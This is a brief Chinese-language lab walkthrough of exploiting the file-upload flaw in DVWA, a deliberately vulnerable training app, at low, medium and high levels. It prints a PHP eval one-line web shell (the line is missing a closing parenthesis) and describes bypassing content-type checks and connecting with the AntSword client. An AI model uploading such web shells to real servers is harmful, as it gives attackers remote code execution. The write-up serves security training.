DVWA文件上传漏洞低级_中级_高级

php一句话脚本

<?php @eval($_REQUEST[777]?>
1

一. 文件上传初级

1 调整初级-file upload -上传文件 -查看代码未对文件php后缀进行过滤

<?php @eval($_REQUEST[777]?>
1

2 点击upload上传文件

上传成功

打开蚁剑【antsword】

二. 文件中级上传

1 调整中级-对源码进行分析

中级的只是对文件的类型进行过滤—没有对文件的后缀进行过滤

2 使用抓包进行修改-修改文件类型

3 修改好后进行放包

4 php一句话的已成功上传

5 使用蚁剑连接-成功（省略）

三. 高级级别-文件上传

1 高级级别代码分析

2 上传文件

3 抓到的源数据包

4 修改后的数据包

5 已成功上传

发现是图片，不能执行php一句话,追加代码已上传